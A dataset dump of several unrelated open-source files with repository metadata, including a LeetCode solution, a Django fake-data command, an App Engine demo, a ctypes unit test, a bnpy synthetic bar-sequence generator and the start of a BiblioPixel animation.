72343fcac5794c27da7dd3512015ec98664b8821 | f5d1ef8ea6173b3b380fa2985fe346162a0b68b3 | /740_Delete_and_Earn.py | fb379e2b588d56ce1b72bdf0c95366aea22dbdde | [] | no_license | ZDawang/leetcode | a66801a2ed5b06ee4e489613885a22e3130618c7 | a46b07adec6a8cb7e331e0b985d88cd34a3d5667 | refs/heads/master | 2021-09-11T15:21:36.496025 | 2018-04-09T06:28:56 | 2018-04-09T06:28:56 | 111,512,346 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#author : zhangdawang
#data: 2017-12
#difficulty degree:
#problem: 740_Delete_and_Earn
#time_complecity:
#space_complecity:
#beats:
from collections import Counter
class Solution(object):
#DP
#使用dp[i]来存储到第i小个数,且删除第i小个数所获得的最大分数
#所以如果第i小个数=第i-1小个数+1:dp[i] = max(dp[j] for j in range(i - 1)) + n * c
#否则dp[i] = max(dp[j] for j in range(i)) + n * c
#空间O(n),时间最差O(nlogn)(排序)
def deleteAndEarn(self, nums):
if not nums: return 0
#计数并从小到大排序
count = sorted(Counter(nums).items(), key = lambda x: x[0])
dp = [0] * len(count)
#用来存放0到第i-2个数(包括第i-2)的最大点数。
maxpoint = 0
for i, (n, c) in enumerate(count):
if n - 1 == count[i - 1][0]:
dp[i] = maxpoint + n * c
else:
dp[i] = max(maxpoint, dp[i - 1]) + n * c
maxpoint = max(maxpoint, dp[i - 1])
return max(dp[-1], maxpoint)
#优化空间复杂度,O(1),错了,还是O(n),count占的空间
def deleteAndEarn2(self, nums):
count = sorted(Counter(nums).items(), key = lambda x: x[0])
cur, pre, mp = 0, 0, 0
for i, (n, c) in enumerate(count):
cur = (mp if n - 1 == count[i - 1][0] else max(mp, pre)) + n * c
mp, pre = max(mp, pre), cur
return max(cur, mp)
nums = [1,1,1,2,4,5,5,5,6]
solute = Solution()
res = solute.deleteAndEarn(nums) | [
"zdawang@bupt.edu.cn"
] | zdawang@bupt.edu.cn |
171ed97b60c4f2239961de9c02cdc8a7beeb2300 | 8981902427dc577228dfd5611c6afe86c3e2e9e2 | /dsmr_stats/management/commands/dsmr_stats_fake_development_data.py | 0539470d7d311df505ea9ed974563875060356e9 | [] | no_license | genie137/dsmr-reader | 5515f4f92bb05bcf00f0e8a0fbd1a018d408950b | 4d934b4838cb2de4a66ff193f4f3095e9beecd99 | refs/heads/master | 2020-03-21T18:14:05.182137 | 2018-06-12T14:54:55 | 2018-06-12T14:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,248 | py | from decimal import Decimal
from time import sleep
import random
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
from django.conf import settings
from django.db import models
from dsmr_stats.models.statistics import DayStatistics, HourStatistics
from dsmr_consumption.models.consumption import ElectricityConsumption
from dsmr_datalogger.models.reading import DsmrReading
class Command(BaseCommand):
help = _('Alters any stats generate to fake data. DO NOT USE in production! Used for integration checks.')
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--ack-to-mess-up-my-data',
action='store_true',
dest='acked_warning',
default=False,
help=_('Required option to acknowledge you that you WILL mess up your data with this.')
)
def handle(self, **options):
""" InfiniteManagementCommandMixin listens to handle() and calls run() in a loop. """
if not settings.DEBUG:
raise CommandError(_('Intended usage is NOT production! Only allowed when DEBUG = True'))
if not options.get('acked_warning'):
raise CommandError(_('Intended usage is NOT production! Force by using --ack-to-mess-up-my-data'))
self._randomize()
def _randomize(self):
""" Generates 'random' stats data by altering existing ones. """
factor = Decimal(random.random()) # Between 0.0 and 1.0, change every day.
print('Using existing consumption as base, multiplied by {}'.format(factor))
sleep(1) # Allow to abort when random number sucks.
print('Altering readings... (might take quite some time)')
DsmrReading.objects.all().order_by('-pk').update(
electricity_returned_1=models.F('electricity_delivered_1') * factor,
electricity_returned_2=models.F('electricity_delivered_2') * factor,
electricity_currently_returned=models.F('electricity_currently_delivered') * factor,
)
print('Altering electricity consumption... (might take quite some time as well)')
ElectricityConsumption.objects.all().update(
returned_1=models.F('delivered_1') * factor,
returned_2=models.F('delivered_2') * factor,
currently_returned=models.F('currently_delivered') * factor,
phase_currently_delivered_l1=models.F('currently_delivered') * factor, # Split.
phase_currently_delivered_l2=models.F('currently_delivered') * (1 - factor), # Remainder of split.
phase_currently_delivered_l3=0.005, # Weird constant, to keep it simple.
)
print('Altering hour statistics...')
HourStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Altering day statistics...')
DayStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Done!')
| [
"github@dennissiemensma.nl"
] | github@dennissiemensma.nl |
2edcd772211818912e2e90300d4d51ee3e1717dc | b84842cfa24fce5b1a8d093bdf45885b0f5ab434 | /configuration/appcaching/main.py | f45cc7805c1e496dbdcc9f2b7eef110336613c36 | [] | no_license | CodedQuen/Programming-Google-App-Engine | fc0f4572a60f3d91f08a15f2b2d19d71673d2de6 | bd3430b84db6477737a7332a358ed37a6ea36b23 | refs/heads/master | 2022-04-25T01:14:08.620872 | 2020-04-30T07:02:26 | 2020-04-30T07:02:26 | 260,136,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,873 | py | import datetime
import webapp2
# An app instance global.
app_counter = 0
class MainPage(webapp2.RequestHandler):
# A class variable.
cls_counter = 0
def __init__(self, *args, **kwargs):
super(MainPage, self).__init__(*args, **kwargs)
# A handler instance variable.
self.counter = 0
def incr_and_print_counter(self):
global app_counter
app_counter += 1
MainPage.cls_counter += 1
self.counter += 1
self.response.write('<p>App counter: %d</p>' % app_counter)
self.response.write('<p>Class counter: %d</p>' % MainPage.cls_counter)
self.response.write('<p>Object counter: %d</p>' % self.counter)
def get(self):
self.response.write('''
<p>This request handler accesses and modifies three counter variables: a module global, a class global, and an handler object member. When App Engine starts a new instance for an app, its memory begins empty. The first request handled by a request handler on the instance imports the <code>main</code> module, which initializes the module global and class global to zero (0). App Engine constructs a new instance of the <code>MainPage</code> class for each request, which initializes its instance member counter.</p>
<p>When you reload this page, the module and class globals may change depending on which instance handles your request, and how many previous requests the instance has handled. This number may fluctuate as new instances are started and requests are distributed across live instances. The object counter remains at 1, because each request gets its own handler object.</p>
''')
self.incr_and_print_counter()
self.response.write('<p>The time is: %s</p>' % str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
edf57439c76d8c1b3d592074a699e34cfd4a5ac4 | acd41dc7e684eb2e58b6bef2b3e86950b8064945 | /res/packages/scripts/scripts/common/Lib/ctypes/test/test_cfuncs.py | 1dd0e756e4abd4e16f874e05426342163b9b7036 | [] | no_license | webiumsk/WoT-0.9.18.0 | e07acd08b33bfe7c73c910f5cb2a054a58a9beea | 89979c1ad547f1a1bbb2189f5ee3b10685e9a216 | refs/heads/master | 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 7,850 | py | # 2017.05.04 15:31:23 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/ctypes/test/test_cfuncs.py
import unittest
from ctypes import *
import _ctypes_test
class CFunctions(unittest.TestCase):
    """Exercise the tf_* test functions exported by the _ctypes_test DLL.

    Every tf_<code> function takes an argument of the ctypes type named by
    <code> (b=byte, H=ushort, q=longlong, ...), returns one third of its
    argument (as the asserted values show), and records the argument in a
    DLL global that S()/U() read back.  The tf_b<code> variants take an
    extra leading byte that is ignored.  NOTE: this is Python 2 source —
    the integer literals use the Py2-only 'L' long suffix.
    """
    _dll = CDLL(_ctypes_test.__file__)
    def S(self):
        """Signed value of the last argument recorded by the DLL."""
        return c_longlong.in_dll(self._dll, 'last_tf_arg_s').value
    def U(self):
        """Unsigned value of the last argument recorded by the DLL."""
        return c_ulonglong.in_dll(self._dll, 'last_tf_arg_u').value
    # Integer types: each test sets restype/argtypes, calls the function,
    # and checks both the return value and the recorded argument.
    def test_byte(self):
        self._dll.tf_b.restype = c_byte
        self._dll.tf_b.argtypes = (c_byte,)
        self.assertEqual(self._dll.tf_b(-126), -42)
        self.assertEqual(self.S(), -126)
    def test_byte_plus(self):
        self._dll.tf_bb.restype = c_byte
        self._dll.tf_bb.argtypes = (c_byte, c_byte)
        self.assertEqual(self._dll.tf_bb(0, -126), -42)
        self.assertEqual(self.S(), -126)
    def test_ubyte(self):
        self._dll.tf_B.restype = c_ubyte
        self._dll.tf_B.argtypes = (c_ubyte,)
        self.assertEqual(self._dll.tf_B(255), 85)
        self.assertEqual(self.U(), 255)
    def test_ubyte_plus(self):
        self._dll.tf_bB.restype = c_ubyte
        self._dll.tf_bB.argtypes = (c_byte, c_ubyte)
        self.assertEqual(self._dll.tf_bB(0, 255), 85)
        self.assertEqual(self.U(), 255)
    def test_short(self):
        self._dll.tf_h.restype = c_short
        self._dll.tf_h.argtypes = (c_short,)
        self.assertEqual(self._dll.tf_h(-32766), -10922)
        self.assertEqual(self.S(), -32766)
    def test_short_plus(self):
        self._dll.tf_bh.restype = c_short
        self._dll.tf_bh.argtypes = (c_byte, c_short)
        self.assertEqual(self._dll.tf_bh(0, -32766), -10922)
        self.assertEqual(self.S(), -32766)
    def test_ushort(self):
        self._dll.tf_H.restype = c_ushort
        self._dll.tf_H.argtypes = (c_ushort,)
        self.assertEqual(self._dll.tf_H(65535), 21845)
        self.assertEqual(self.U(), 65535)
    def test_ushort_plus(self):
        self._dll.tf_bH.restype = c_ushort
        self._dll.tf_bH.argtypes = (c_byte, c_ushort)
        self.assertEqual(self._dll.tf_bH(0, 65535), 21845)
        self.assertEqual(self.U(), 65535)
    def test_int(self):
        self._dll.tf_i.restype = c_int
        self._dll.tf_i.argtypes = (c_int,)
        self.assertEqual(self._dll.tf_i(-2147483646), -715827882)
        self.assertEqual(self.S(), -2147483646)
    def test_int_plus(self):
        self._dll.tf_bi.restype = c_int
        self._dll.tf_bi.argtypes = (c_byte, c_int)
        self.assertEqual(self._dll.tf_bi(0, -2147483646), -715827882)
        self.assertEqual(self.S(), -2147483646)
    def test_uint(self):
        self._dll.tf_I.restype = c_uint
        self._dll.tf_I.argtypes = (c_uint,)
        self.assertEqual(self._dll.tf_I(4294967295L), 1431655765)
        self.assertEqual(self.U(), 4294967295L)
    def test_uint_plus(self):
        self._dll.tf_bI.restype = c_uint
        self._dll.tf_bI.argtypes = (c_byte, c_uint)
        self.assertEqual(self._dll.tf_bI(0, 4294967295L), 1431655765)
        self.assertEqual(self.U(), 4294967295L)
    def test_long(self):
        self._dll.tf_l.restype = c_long
        self._dll.tf_l.argtypes = (c_long,)
        self.assertEqual(self._dll.tf_l(-2147483646), -715827882)
        self.assertEqual(self.S(), -2147483646)
    def test_long_plus(self):
        self._dll.tf_bl.restype = c_long
        self._dll.tf_bl.argtypes = (c_byte, c_long)
        self.assertEqual(self._dll.tf_bl(0, -2147483646), -715827882)
        self.assertEqual(self.S(), -2147483646)
    def test_ulong(self):
        self._dll.tf_L.restype = c_ulong
        self._dll.tf_L.argtypes = (c_ulong,)
        self.assertEqual(self._dll.tf_L(4294967295L), 1431655765)
        self.assertEqual(self.U(), 4294967295L)
    def test_ulong_plus(self):
        # Note: the leading parameter is a c_char here, so the filler
        # argument is a one-character string rather than 0.
        self._dll.tf_bL.restype = c_ulong
        self._dll.tf_bL.argtypes = (c_char, c_ulong)
        self.assertEqual(self._dll.tf_bL(' ', 4294967295L), 1431655765)
        self.assertEqual(self.U(), 4294967295L)
    def test_longlong(self):
        self._dll.tf_q.restype = c_longlong
        self._dll.tf_q.argtypes = (c_longlong,)
        self.assertEqual(self._dll.tf_q(-9223372036854775806L), -3074457345618258602L)
        self.assertEqual(self.S(), -9223372036854775806L)
    def test_longlong_plus(self):
        self._dll.tf_bq.restype = c_longlong
        self._dll.tf_bq.argtypes = (c_byte, c_longlong)
        self.assertEqual(self._dll.tf_bq(0, -9223372036854775806L), -3074457345618258602L)
        self.assertEqual(self.S(), -9223372036854775806L)
    def test_ulonglong(self):
        self._dll.tf_Q.restype = c_ulonglong
        self._dll.tf_Q.argtypes = (c_ulonglong,)
        self.assertEqual(self._dll.tf_Q(18446744073709551615L), 6148914691236517205L)
        self.assertEqual(self.U(), 18446744073709551615L)
    def test_ulonglong_plus(self):
        self._dll.tf_bQ.restype = c_ulonglong
        self._dll.tf_bQ.argtypes = (c_byte, c_ulonglong)
        self.assertEqual(self._dll.tf_bQ(0, 18446744073709551615L), 6148914691236517205L)
        self.assertEqual(self.U(), 18446744073709551615L)
    # Floating-point types: argument is truncated when recorded, so S()
    # still compares equal to the integral test values.
    def test_float(self):
        self._dll.tf_f.restype = c_float
        self._dll.tf_f.argtypes = (c_float,)
        self.assertEqual(self._dll.tf_f(-42.0), -14.0)
        self.assertEqual(self.S(), -42)
    def test_float_plus(self):
        self._dll.tf_bf.restype = c_float
        self._dll.tf_bf.argtypes = (c_byte, c_float)
        self.assertEqual(self._dll.tf_bf(0, -42.0), -14.0)
        self.assertEqual(self.S(), -42)
    def test_double(self):
        self._dll.tf_d.restype = c_double
        self._dll.tf_d.argtypes = (c_double,)
        self.assertEqual(self._dll.tf_d(42.0), 14.0)
        self.assertEqual(self.S(), 42)
    def test_double_plus(self):
        self._dll.tf_bd.restype = c_double
        self._dll.tf_bd.argtypes = (c_byte, c_double)
        self.assertEqual(self._dll.tf_bd(0, 42.0), 14.0)
        self.assertEqual(self.S(), 42)
    def test_longdouble(self):
        self._dll.tf_D.restype = c_longdouble
        self._dll.tf_D.argtypes = (c_longdouble,)
        self.assertEqual(self._dll.tf_D(42.0), 14.0)
        self.assertEqual(self.S(), 42)
    def test_longdouble_plus(self):
        self._dll.tf_bD.restype = c_longdouble
        self._dll.tf_bD.argtypes = (c_byte, c_longdouble)
        self.assertEqual(self._dll.tf_bD(0, 42.0), 14.0)
        self.assertEqual(self.S(), 42)
    def test_callwithresult(self):
        # restype may be an arbitrary callable, which post-processes the
        # raw integer return value (here: doubles 42 // 3 == 14 to 28).
        def process_result(result):
            return result * 2
        self._dll.tf_i.restype = process_result
        self._dll.tf_i.argtypes = (c_int,)
        self.assertEqual(self._dll.tf_i(42), 28)
        self.assertEqual(self.S(), 42)
        self.assertEqual(self._dll.tf_i(-42), -28)
        self.assertEqual(self.S(), -42)
    def test_void(self):
        # restype = None means the function returns void -> Python None.
        self._dll.tv_i.restype = None
        self._dll.tv_i.argtypes = (c_int,)
        self.assertEqual(self._dll.tv_i(42), None)
        self.assertEqual(self.S(), 42)
        self.assertEqual(self._dll.tv_i(-42), None)
        self.assertEqual(self.S(), -42)
        return
try:
    # WinDLL exists only on Windows; elsewhere the stdcall variants below
    # are simply skipped.
    WinDLL
except NameError:
    pass
else:
    class stdcall_dll(WinDLL):
        # Transparently redirect attribute lookups to the stdcall exports,
        # which carry an 's_' prefix in the test DLL; the resolved function
        # pointer is cached on the instance via setattr.
        def __getattr__(self, name):
            if name[:2] == '__' and name[-2:] == '__':
                raise AttributeError(name)
            func = self._FuncPtr(('s_' + name, self))
            setattr(self, name, func)
            return func
    # Re-run the entire CFunctions suite through the stdcall convention.
    class stdcallCFunctions(CFunctions):
        _dll = stdcall_dll(_ctypes_test.__file__)
if __name__ == '__main__':
    unittest.main()
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\common\Lib\ctypes\test\test_cfuncs.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:31:23 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
4bf4f653d1613c7c86df9e27f28d4e409cace30d | 5006a6965c21e5b828300eedf907eb55ec5b8b27 | /bnpy/datasets/zzz_unsupported/SeqOfBinBars9x9.py | 27e0894613c7097a982c3c7cb0276837370c30f6 | [
"BSD-3-Clause"
] | permissive | birlrobotics/bnpy | 1804d0fed9c3db4c270f4cd6616b30323326f1ec | 8f297d8f3e4a56088d7755134c329f63a550be9e | refs/heads/master | 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,831 | py | '''
SeqOfBinBars9x9.py
Binary toy bars data, with a 9x9 grid,
so each observation is a vector of size 81.
There are K=20 true topics
* one common background topic (with prob of 0.05 for all pixels)
* one rare foreground topic (with prob of 0.90 for all pixels)
* 18 bar topics, one for each row/col of the grid.
The basic idea is that the background topic is by far most common.
It takes over 50% of all timesteps.
The horizontal bars and the vertical bars form coherent groups,
where we transition between each bar (1-9) in a standard step-by-step way.
The rare foreground topic simulates the rare "artificial" phenomena
reported by some authors, of unusual all-marks-on bursts in chr data.
'''
import os
import sys
import scipy.io
import numpy as np
from bnpy.data import GroupXData
from bnpy.util import as1D
K = 20  # Number of topics
D = 81  # Vocabulary Size
# Indices of the two non-bar topics (bars occupy indices 0-17):
bgStateID = 18  # common background topic
fgStateID = 19  # rare all-pixels-on foreground topic
Defaults = dict()
Defaults['nDocTotal'] = 50  # number of sequences to generate
Defaults['T'] = 10000  # timesteps per sequence
Defaults['bgProb'] = 0.05  # per-pixel on-probability for background pixels
Defaults['fgProb'] = 0.90  # per-pixel on-probability inside a bar
Defaults['seed'] = 8675309  # RNG seed, for reproducibility
Defaults['maxTConsec'] = Defaults['T'] / 5.0  # cap on consecutive repeats of one state
def get_data(**kwargs):
    """Build the SeqOfBinBars9x9 dataset and tag it with a name and summary.

    All keyword arguments are forwarded unchanged to generateDataset().
    """
    dataset = generateDataset(**kwargs)
    dataset.name = 'SeqOfBinBars9x9'
    dataset.summary = 'Binary Bar Sequences with %d true topics.' % (K)
    return dataset
def makePi(stickyProb=0.95, extraStickyProb=0.9999, **kwargs):
    """Build the K x K Markov transition matrix over topics.

    Bar topics (0-17) self-transition with probability `stickyProb` and
    otherwise step to the next bar in their group; the last bar of each
    group falls back to the background topic.  The background topic is
    extra sticky, with its rare exits split 5:5:2 between the first
    horizontal bar, the first vertical bar, and the foreground topic; the
    foreground topic always returns to the background.  Each row sums to 1.
    """
    trans = np.zeros((K, K))
    # Horizontal bars occupy rows 0-8, vertical bars rows 9-17.
    for base in (0, 9):
        for offset in range(9):
            k = base + offset
            trans[k, k] = stickyProb
            nxt = bgStateID if offset == 8 else base + (offset + 1) % 9
            trans[k, nxt] = 1 - stickyProb
    # Background row.
    trans[bgStateID, :] = 0.0
    trans[bgStateID, bgStateID] = extraStickyProb
    trans[bgStateID, 0] = 5.0 / 12 * (1 - extraStickyProb)
    trans[bgStateID, 9] = 5.0 / 12 * (1 - extraStickyProb)
    trans[bgStateID, fgStateID] = 2.0 / 12 * (1 - extraStickyProb)
    # Foreground row: moderately sticky, otherwise back to background.
    fgSticky = 0.5 * (stickyProb + extraStickyProb)
    trans[fgStateID, :] = 0.0
    trans[fgStateID, fgStateID] = fgSticky
    trans[fgStateID, bgStateID] = 1 - fgSticky
    assert np.allclose(1.0, np.sum(trans, 1))
    return trans
def makePhi(fgProb=0.75, bgProb=0.05, **kwargs):
    ''' Make phi matrix that defines the on-probability of each pixel.

    Parameters
    ----------
    fgProb : float, on-probability of a pixel inside a bar (and of every
        pixel of the rare foreground topic).
    bgProb : float, on-probability of every other pixel.

    Returns
    -------
    phi : 2D array, K x D; row k holds topic k's per-pixel probabilities.
    '''
    # np.ones requires integer dimensions; np.sqrt returns a float, which
    # raises TypeError on modern NumPy, so convert the side length once.
    side = int(np.sqrt(D))
    phi = bgProb * np.ones((K, side, side))
    for k in range(18):
        if k < 9:
            # Horizontal bars: topic k lights up row k of the grid.
            phi[k, k, :] = fgProb
        else:
            # Vertical bars: topic k lights up column k - 9.
            phi[k, :, k - 9] = fgProb
    phi[-2, :, :] = bgProb  # common background topic: all pixels dim
    phi[-1, :, :] = fgProb  # rare foreground topic: all pixels bright
    phi = np.reshape(phi, (K, D))
    return phi
def generateDataset(**kwargs):
    ''' Draw the full dataset of binary bar sequences.

    Any keyword not supplied is filled in from the module-level Defaults.
    Returns a GroupXData whose TrueParams hold the generating phi, the
    mean transition weights (beta), and the per-timestep state labels Z.
    Draw order from PRNG is fixed, so results are reproducible per seed.
    '''
    for key in Defaults:
        if key not in kwargs:
            kwargs[key] = Defaults[key]
    phi = makePhi(**kwargs)
    transPi = makePi(**kwargs)
    PRNG = np.random.RandomState(kwargs['seed'])
    nSeq = kwargs['nDocTotal']
    T_in = kwargs['T']
    # 'T' may be a single int or a comma-separated string of per-sequence
    # lengths; normalize to a list first, then to one length per sequence.
    if isinstance(T_in, str):
        Tvals = [int(T) for T in T_in.split(',')]
    else:
        Tvals = [T_in]
    if len(Tvals) == 1:
        seqLens = Tvals[0] * np.ones(nSeq, dtype=np.int32)
    elif len(Tvals) < nSeq:
        seqLens = np.tile(Tvals, nSeq)[:nSeq]
    elif len(Tvals) >= nSeq:
        seqLens = np.asarray(Tvals, dtype=np.int32)[:nSeq]
    doc_range = np.hstack([0, np.cumsum(seqLens)])
    N = doc_range[-1]
    allX = np.zeros((N, D))
    allZ = np.zeros(N, dtype=np.int32)
    startStates = [bgStateID, fgStateID]
    states0toKm1 = np.arange(K)
    # Each iteration generates one time-series/sequence
    # with starting state deterministically rotating among all states
    for i in xrange(nSeq):
        start = doc_range[i]
        stop = doc_range[i + 1]
        T = stop - start
        Z = np.zeros(T, dtype=np.int32)
        X = np.zeros((T, D))
        nConsec = 0
        Z[0] = startStates[i % len(startStates)]
        X[0] = PRNG.rand(D) < phi[Z[0]]
        for t in xrange(1, T):
            if nConsec > kwargs['maxTConsec']:
                # Force transition if we've gone on too long
                # (zero out the self-transition and renormalize the row).
                transPi_t = transPi[Z[t - 1]].copy()
                transPi_t[Z[t - 1]] = 0
                transPi_t /= transPi_t.sum()
            else:
                transPi_t = transPi[Z[t - 1]]
            Z[t] = PRNG.choice(states0toKm1, p=transPi_t)
            # Emit pixels: independent Bernoulli draws under topic Z[t].
            X[t] = PRNG.rand(D) < phi[Z[t]]
            if Z[t] == Z[t - 1]:
                nConsec += 1
            else:
                nConsec = 0
        allZ[start:stop] = Z
        allX[start:stop] = X
    TrueParams = dict()
    TrueParams['beta'] = np.mean(transPi, axis=0)
    TrueParams['phi'] = phi
    TrueParams['Z'] = allZ
    TrueParams['K'] = K
    return GroupXData(allX, doc_range=doc_range, TrueParams=TrueParams)
# Default location for saved outputs; requires the XHMMROOT env var to be set.
DefaultOutputDir = os.path.join(
    os.environ['XHMMROOT'], 'datasets', 'SeqOfBinBars9x9')
def saveDatasetToDisk(outputdir=DefaultOutputDir):
    ''' Save dataset to disk for scalable experiments.
    '''
    Data = get_data()
    # Report how many timesteps each true topic generated (Python 2 print).
    for k in xrange(K):
        print 'N[%d] = %d' % (k, np.sum(Data.TrueParams['Z'] == k))
    # Save it as batches
    nDocPerBatch = 2
    nBatch = Data.nDocTotal // nDocPerBatch
    for batchID in xrange(nBatch):
        mask = np.arange(batchID * nDocPerBatch, (batchID + 1) * nDocPerBatch)
        Dbatch = Data.select_subset_by_mask(mask, doTrackTruth=1)
        outmatpath = os.path.join(
            outputdir,
            'batches/batch%02d.mat' %
            (batchID))
        Dbatch.save_to_mat(outmatpath)
    # Companion files: a batch manifest plus a small two-sequence sample.
    with open(os.path.join(outputdir, 'batches/Info.conf'), 'w') as f:
        f.write('datasetName = SeqOfBinBars9x9\n')
        f.write('nBatchTotal = %d\n' % (nBatch))
        f.write('nDocTotal = %d\n' % (Data.nDocTotal))
    Dsmall = Data.select_subset_by_mask([0, 1], doTrackTruth=1)
    Dsmall.save_to_mat(os.path.join(outputdir, 'HMMdataset.mat'))
if __name__ == '__main__':
    # Ad-hoc visual check: generate two sequences and display each one as
    # an image (time on the vertical axis, the D pixels on the horizontal).
    import scipy.io
    import bnpy.viz.BernViz as BernViz
    # saveDatasetToDisk()
    # BernViz.plotCompsAsSquareImages(Data.TrueParams['phi'])
    Data = get_data(nDocTotal=2)
    pylab = BernViz.pylab
    pylab.subplots(nrows=1, ncols=Data.nDoc)
    for d in xrange(2):
        start = Data.doc_range[d]
        stop = Data.doc_range[d + 1]
        pylab.subplot(1, Data.nDoc, d + 1)
        Xim = Data.X[start:stop]
        pylab.imshow(Xim,
                     interpolation='nearest', cmap='bone',
                     aspect=Xim.shape[1] / float(Xim.shape[0]),
                     )
        # Show at most the first 5000 timesteps, newest at the bottom.
        pylab.ylim([np.minimum(stop - start, 5000), 0])
    pylab.show(block=True)
| [
"hongminwu0120@gmail.com"
] | hongminwu0120@gmail.com |
8a51add4f7cac897e5689c2db9965056e5429db9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02684/s383863332.py | cee048d87cd74a0e9eb30d0721462d9b668e3bb4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | N, K = map(int, input().split())
A = list(map(int, input().split()))
visited = [0 for _ in range(N)]
first_visit = [0 for _ in range(N)]
now = 0
flag = True
for i in range(10 ** 5 * 5):
if first_visit[now] == 0:
first_visit[now] = i
visited[A[now] - 1] += 1
now = A[now] - 1
if i == K - 1:
print(now + 1)
flag = False
break
if flag:
num = 0
for i in range(N):
if visited[i] > 2:
num += 1
for i in range(N):
if visited[i] >= 2:
if K % num == first_visit[i] % num:
print(i + 1)
break
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b31f8616e5f36658a3e7687d1080014d2b0a7da7 | 0c39d88b4cdd35c96be02573f804196721d88f52 | /mentha/tests/persistent_settings.py | 818c47a931bc6c7a1b7dd1227006db39ec15c0fa | [
"MIT"
] | permissive | ateoto/django-mentha | 7909e5ad989481fa57aa3336bcb98380c6e9e762 | 2b9aeba1f9a33ee76dca2e1f9436e964be2c2325 | refs/heads/master | 2016-09-06T13:59:49.994441 | 2014-06-10T23:45:30 | 2014-06-10T23:45:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from .test_settings import * # NOQA
# App lists are provided by test_settings via the star import above.
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
# File-backed SQLite database so state persists between test runs.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'db.sqlite',
    }
} | [
"mattmccants@gmail.com"
] | mattmccants@gmail.com |
16ea3f9021e49cc8cb94b0503223dd1a3ede9237 | 32a7a7663ce0c94dc7c6465e1a4b819145d17e87 | /BiblioPixelAnimations/matrix/MathFunc.py | 997fdced226c3f7c7b4c30d62bc9a1a0e66c1415 | [
"MIT"
] | permissive | CriticalTechGuy/BiblioPixelAnimations | 04d08e1d41f374b63aa90956b3aeda2db6484d02 | 2a3a1671f289b21d7da316df1b5ca54d7f95a3b1 | refs/heads/master | 2020-03-26T06:24:12.460928 | 2018-04-19T10:17:21 | 2018-04-19T11:36:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,300 | py | from bibliopixel.animation import BaseMatrixAnim
import bibliopixel.colors as colors
import random
import math
def hue_fade(a, b, val):
    """Interpolate from hue ``a`` toward hue ``b`` by fraction ``val``.

    Travel is always in the increasing-hue direction around the 360-degree
    color wheel (wrapping past 360 when a > b); the result is reduced back
    into the range [0, 360).
    """
    span = b - a if a <= b else b + 360 - a
    return (a + span * val) % 360
class MathFunc(BaseMatrixAnim):
    """Matrix animation coloring each pixel by a hue computed from f(x, y, step).

    One of ``funcs`` is active at a time; every ``frames_per`` frames the
    animation picks the next function (randomly if ``rand``) and, when
    ``fade_frames`` > 0, cross-fades the hues over that many frames.
    """
    # Candidate hue formulas; call_func() folds their output into [0, 360).
    funcs = [
        lambda x, y, s: x + (x * y) + s,
        lambda x, y, s: x * s + (x * y),
        lambda x, y, s: x * y * s + s,
        lambda x, y, s: x * y - math.log(s + 1) + s,
        lambda x, y, s: math.cos(0.5 * x) * y + s,
        lambda x, y, s: math.cos(x * y) * y + s,
        lambda x, y, s: math.tan(y) * math.cos(x) + s,
        lambda x, y, s: math.sin(y) + x * s,
        lambda x, y, s: math.sin(x) + y * s,
        lambda x, y, s: math.sin(x * y) + y * x + s,
        lambda x, y, s: x * x - y * y + s,
        lambda x, y, s: (x * y - y * y) + s,
        lambda x, y, s: (x * y - y * y) % (s + 1),
        lambda x, y, s: (y * y + x * x) + s,
        lambda x, y, s: x * y * 2 - y * y * 2 + s,
        lambda x, y, s: (x / (y + 1)) + (y * y) + s,
        lambda x, y, s: ((x * x) / 2 * (y + 1)) + s,
        lambda x, y, s: x * y * (x + y) + s,
        lambda x, y, s: x * y * (s / (x + 1)),
        lambda x, y, s: (x * x * x) - (y * y * 2) + s,
        lambda x, y, s: x * 12 - y * 4 + s,
        lambda x, y, s: math.log10(x + 1) * (y * 2) + s
    ]
    def __init__(self, layout, frames_per=300, func=0, rand=True, fade_frames=30):
        super().__init__(layout)
        self.start_func = func  # starting function index when rand is False
        self.frames_per = frames_per  # frames before switching functions (0 = never)
        self.rand = rand  # pick the next function randomly vs. sequentially
        self.fade_frames = fade_frames  # cross-fade length; 0 switches instantly
        self.fade_step = 1.0 / fade_frames if fade_frames else 0.0
    def pre_run(self):
        # Reset all per-run counters and choose the initial function.
        self._step = 0
        self.count = 0
        self.fade_count = 0
        self.cur_func = random.choice(range(len(self.funcs))) if self.rand else self.start_func
